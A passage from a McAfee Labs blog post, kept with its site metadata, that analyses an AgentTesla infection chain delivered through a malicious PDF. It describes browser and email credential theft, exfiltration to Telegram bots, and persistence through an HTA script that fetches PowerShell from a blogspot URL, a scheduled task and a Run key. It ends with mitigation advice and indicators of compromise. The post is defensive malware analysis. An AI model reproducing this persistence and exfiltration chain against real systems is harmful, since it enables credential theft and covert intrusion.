sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 21: Procmons logs for browsers(2)<\/em><\/p>\n<h2>Credential Access:<\/h2>\n<p>In addition to this, it steals sensitive information such as browser history, cookies, credentials, SMTP information, session information, and email client data such as Otlook profiles, etc.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184950 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Credentials.png\" alt=\"\" width=\"744\" height=\"272\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Credentials.png 744w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Credentials-300x110.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Credentials-205x75.png 205w\" sizes=\"auto, (max-width: 744px) 100vw, 744px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 22: Credentials<\/em><\/p>\n<h2>Exfiltration:<\/h2>\n<p>Through debugging the code, we were able to uncover the domain it was utilizing for exfiltration. The following figure shows the URL used for exfiltration:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184965 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Domain-obtained.png\" alt=\"\" width=\"780\" height=\"353\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Domain-obtained.png 780w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Domain-obtained-300x136.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Domain-obtained-768x348.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Domain-obtained-205x93.png 205w\" sizes=\"auto, (max-width: 780px) 100vw, 780px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 23: Domain obtained<\/em><\/p>\n<p>The same was evident from Procmon logs shown in the Figure below:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184980 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmon-logs-of-Connection-for-exfiltration.png\" alt=\"\" width=\"550\" height=\"187\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmon-logs-of-Connection-for-exfiltration.png 550w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmon-logs-of-Connection-for-exfiltration-300x102.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmon-logs-of-Connection-for-exfiltration-205x70.png 205w\" sizes=\"auto, (max-width: 550px) 100vw, 550px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 24: Procmon logs of Connection for exfiltration<\/em><\/p>\n<p style=\"text-align: center;\">The DNS record of IP address 149.154.167.220 belongs to Telegram messenger.<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184995 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/DNS-record.png\" alt=\"\" width=\"314\" height=\"134\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/DNS-record.png 314w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/DNS-record-300x128.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/DNS-record-205x87.png 205w\" sizes=\"auto, (max-width: 314px) 100vw, 314px\" \/><\/center><\/p>\n<p style=\"text-align: center;\"><em><br \/>\nFigure 25: DNS record<\/em><\/p>\n<p>AgentTesla leverages Telegram bots for data exfiltration due to several advantageous factors. Firstly, Telegram provides robust end-to-end encryption, ensuring the security of transmitted data. Secondly, the platform offers anonymity for bot creators, enhancing the stealth of malicious activities. Thirdly, Telegram&#8217;s user-friendly interface simplifies communication processes for both attackers and their command-and-control infrastructure. Additionally, since Telegram is a widely used messaging platform, traffic to its servers may appear less suspicious compared to other channels, aiding in evading detection. Moreover, Telegram&#8217;s infrastructure resilience makes it a reliable option for maintaining communication channels even amidst takedown efforts.<\/p>\n<p style=\"text-align: left;\">Overall, the combination of security, anonymity, ease of use, stealth, and resilience makes Telegram bots an appealing choice for AgentTesla&#8217;s data exfiltration tactics. And to achieve this, it establishes contact with the respective domain associated with the bot and transmits the data, which is then tracked by a specific bot ID.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-185010 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/TelegramBot-for-exfiltration.png\" alt=\"\" width=\"782\" height=\"79\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/TelegramBot-for-exfiltration.png 782w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/TelegramBot-for-exfiltration-300x30.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/TelegramBot-for-exfiltration-768x78.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/TelegramBot-for-exfiltration-205x21.png 205w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><br \/>\n<em>Figure 26: TelegramBot for exfiltration<\/em><\/p>\n<p>In a nutshell, this script was tasked with decoding the payload, retrieving legitimate .NET executable paths, performing process injection to execute the malware, collecting data, and ultimately exfiltrating the acquired information.<\/p>\n<h2>Persistence:<\/h2>\n<p>Moving forward with atom.ps1 (Figure 11), the next is variable 4, labeled as &#8220;koaskodkwllWWW&#8221;, and is decrypted using the function &#8220;asceeeeeeeeeeeeeeee&#8221;. Upon decryption, the content is decoded as follows:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-185196 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-4-decoded.png\" alt=\"\" width=\"637\" height=\"142\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-4-decoded.png 637w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-4-decoded-300x67.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-4-decoded-205x46.png 205w\" sizes=\"auto, (max-width: 637px) 100vw, 637px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 27: Variable 4 decoded<\/em><\/p>\n<p>This script establishes persistence by:<\/p>\n<ol>\n<li>Creating an HTA script to execute PowerShell commands fetched remotely. The script incorporates JavaScript code that utilizes ActiveX objects to execute commands. Specifically, it creates an instance of WScript.Shell to run a PowerShell command fetched from a remote location (linkcomsexi).<\/li>\n<li>It registers a scheduled task named &#8220;Tnamesexi&#8221; utilizing Register-ScheduledTask. The task is set to trigger once at a specific time, calculated by adding a certain number of minutes (mynsexi) to the current time.<\/li>\n<li>Lastly, it sets a registry value under the current user&#8217;s Run key (HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run). This registry value, named &#8220;Tnamesexi,&#8221; is configured to execute the command schtasks \/run \/tn $taskName, thereby manually triggering the scheduled task established in the preceding step.<\/li>\n<\/ol>\n<p>Ultimately, the content highlighted in green in Figure 11 performs the final task. The instructions are as follows:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-185026 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Persistence-instructions.png\" alt=\"\" width=\"626\" height=\"196\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Persistence-instructions.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Persistence-instructions-300x94.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Persistence-instructions-205x64.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 28: Persistence instructions<\/em><\/p>\n<p>Now, after substituting the values:<\/p>\n<ul>\n<li>&#8220;mynsexi&#8221; is set to &#8220;213&#8221;, indicating that the script will be executed again after 213 minutes.<\/li>\n<li>&#8220;Tnamesexi&#8221; is defined as &#8220;chromeupdateri&#8221;, implying that a Run entry will be created under this name.<\/li>\n<li>&#8220;linkcomsexi&#8221; is assigned the value &#8220;htljan62024.blogspot.com\/\/\/\/\/\/\/\/\/\/atom.xml&#8221;, suggesting that the atom.ps1 file will be fetched again from this URL.<\/li>\n<\/ul>\n<p>We inspected registry entries and scheduled task entries for cross-verification. And the script did as directed:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-185041 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Registry-entry-for-Persistence.png\" alt=\"\" width=\"626\" height=\"122\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Registry-entry-for-Persistence.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Registry-entry-for-Persistence-300x58.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Registry-entry-for-Persistence-205x40.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 29: Registry entry for Persistence<\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-185056 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Task-Scheduler.png\" alt=\"\" width=\"626\" height=\"353\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Task-Scheduler.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Task-Scheduler-300x169.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Task-Scheduler-205x116.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 30: Task Scheduler<\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-185071 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmon-logs-for-persistence.png\" alt=\"\" width=\"626\" height=\"112\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmon-logs-for-persistence.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmon-logs-for-persistence-300x54.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmon-logs-for-persistence-205x37.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 31: Procmon logs for persistence<\/em><\/p>\n<p>In summary, the script is configured to execute again after 213 minutes, creating a Run entry named &#8220;chromeupdateri&#8221; and fetching the atom.ps1 file again from &#8220;htljan62024.blogspot.com\/\/\/\/\/\/\/\/\/\/atom.xml&#8221;.<\/p>\n<h2>Execution with old and unpatched version of Acrobat Reader:<\/h2>\n<p>Upon opening the PDF in the old, unpatched version of Acrobat Reader, a prompt immediately appeared indicating the launch of MSHTA along with the entire JavaScript code contained therein. This is depicted in the figure below.<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-185086 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Prompt-for-embedded-javascript.png\" alt=\"\" width=\"624\" height=\"293\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Prompt-for-embedded-javascript.png 624w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Prompt-for-embedded-javascript-300x141.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Prompt-for-embedded-javascript-205x96.png 205w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 32: Prompt for embedded javascript<\/em><\/p>\n<p>Upon examining the streams of the PDF, we discovered the identical script embedded within the document:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-185101 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Embedded-javascript-in-PDF.png\" alt=\"\" width=\"782\" height=\"66\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Embedded-javascript-in-PDF.png 782w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Embedded-javascript-in-PDF-300x25.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Embedded-javascript-in-PDF-768x65.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Embedded-javascript-in-PDF-205x17.png 205w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 33: Embedded javascript in PDF<\/em><\/p>\n<p>After the launch of MSHTA, an instance of PowerShell is invoked, initiating process injection into Regsvcs.exe and injection of AgentTesla. Consequently, utilizing an old and unpatched version of Acrobat Reader, interaction with the PDF is unnecessary; mere opening of the PDF file results in system infection by the malware.<\/p>\n<h2>Summary:<\/h2>\n<p>The chain of events initiates with the delivery of a PDF file containing malicious content. Upon opening the PDF, the embedded malicious code triggers the execution of a JavaScript payload, leading to the download and execution of a PowerShell script. This PowerShell script then decrypts and executes a binary, in the form of a .NET DLL file, which injects AgentTesla payload into legitimate processes to evade detection. The malware communicates with command-and-control servers, exfiltrating sensitive data through Telegram bots for stealthy transmission. To ensure persistence, the malware establishes scheduled tasks and registry entries, allowing it to execute periodically and maintain its presence on the infected system. In the old version of Acrobat Reader, opening the PDF triggered the automatic execution of malicious JavaScript, leading to the injection of AgentTesla malware via PowerShell into Regsvcs.exe. Inspection of the PDF streams revealed the embedded script, further confirming the exploitation of vulnerabilities without requiring user interaction. This orchestrated sequence underscores the sophisticated nature of the attack, spanning from initial infection to data exfiltration and persistent infiltration, posing significant challenges for detection and mitigation efforts.<\/p>\n<h2>Mitigation:<\/h2>\n<p>Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:<\/p>\n<ul>\n<li>Verify Sender Information<\/li>\n<li>Think Before Clicking Links and Warnings<\/li>\n<li>Check for Spelling and Grammar Errors<\/li>\n<li>Be Cautious with Email Content<\/li>\n<li>Verify Unusual Requests<\/li>\n<li>Use Email Spam Filters<\/li>\n<li>Check for Secure HTTP Connections<\/li>\n<li>Delete Suspicious Emails<\/li>\n<li>Keep Windows and Security Software Up to date<\/li>\n<li>Use the latest and patched version of Acrobat reader<\/li>\n<\/ul>\n<h2>Indicators of Compromise (IOCs)<\/h2>\n<table>\n<tbody>\n<tr>\n<td width=\"104\">PDF<\/td>\n<td width=\"520\">8f8264c173e6d036e87b706dbb87e3036ae17df32e53a683c87bff94fce2c242<\/td>\n<\/tr>\n<tr>\n<td width=\"104\">Javascript<\/td>\n<td width=\"520\">3ea81c292f36f2583d2291e8a393014da62767447dba7b139a6c45574647aa2b<\/td>\n<\/tr>\n<tr>\n<td width=\"104\">ps1 file<\/td>\n<td width=\"520\">db726e060f4feccf4bdfa843e3c10cbac80509585fd55c6d1bfce5e312a4e429<\/td>\n<\/tr>\n<tr>\n<td width=\"104\">dll<\/td>\n<td width=\"520\">5b6d8f91201ba9c879e46062190817954e28ceb61a67e55870bb61d1960854ee<\/td>\n<\/tr>\n<tr>\n<td width=\"104\">exe<\/td>\n<td width=\"520\">dec2ce698ab8600d96dd3353b5e47d802441c6df18aed1dd6a2b78311369659e<\/td>\n<\/tr>\n<tr>\n<td width=\"104\">IPv4<\/td>\n<td width=\"520\">149.154.167.220<\/td>\n<\/tr>\n<tr>\n<td width=\"104\">URL<\/td>\n<td width=\"520\">http:\/\/htloctmain25.blogspot[.]com\/atom.xml<\/td>\n<\/tr>\n<tr>\n<td width=\"104\">URL<\/td>\n<td width=\"520\">https:\/\/bio0king[.]blogspot[.]com<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><em>Table 1: Indicators of Compromise<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Authored by Yashvi Shah and Preksha Saxena McAfee Labs has recently observed a significant surge in the distribution of prominent&#8230;<\/p>\n","protected":false},"author":695,"featured_media":185176,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[],"coauthors":[4136],"class_list":["post-184587","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Rise in Deceptive PDF: The Gateway to Malicious Payloads | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Authored by Yashvi Shah and Preksha Saxena McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Rise in Deceptive PDF: The Gateway to Malicious Payloads | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Authored by Yashvi Shah and Preksha Saxena McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2024-03-01T17:40:48+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-03-07T07:23:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/300x200_Blog_050823-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"Rise in Deceptive PDF: The Gateway to Malicious Payloads\",\"datePublished\":\"2024-03-01T17:40:48+00:00\",\"dateModified\":\"2024-03-07T07:23:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/\"},\"wordCount\":3059,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/300x200_Blog_050823-1.png\",\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/\",\"name\":\"Rise in Deceptive PDF: The Gateway to Malicious Payloads | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/300x200_Blog_050823-1.png\",\"datePublished\":\"2024-03-01T17:40:48+00:00\",\"dateModified\":\"2024-03-07T07:23:24+00:00\",\"description\":\"Authored by Yashvi Shah and Preksha Saxena McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/300x200_Blog_050823-1.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/300x200_Blog_050823-1.png\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Rise in Deceptive PDF: The Gateway to Malicious Payloads\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Rise in Deceptive PDF: The Gateway to Malicious Payloads | McAfee Blog","description":"Authored by Yashvi Shah and Preksha Saxena McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Rise in Deceptive PDF: The Gateway to Malicious Payloads | McAfee Blog","og_description":"Authored by Yashvi Shah and Preksha Saxena McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2024-03-01T17:40:48+00:00","article_modified_time":"2024-03-07T07:23:24+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/300x200_Blog_050823-1.png","type":"image\/png"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"Rise in Deceptive PDF: The Gateway to Malicious Payloads","datePublished":"2024-03-01T17:40:48+00:00","dateModified":"2024-03-07T07:23:24+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/"},"wordCount":3059,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/300x200_Blog_050823-1.png","articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/","name":"Rise in 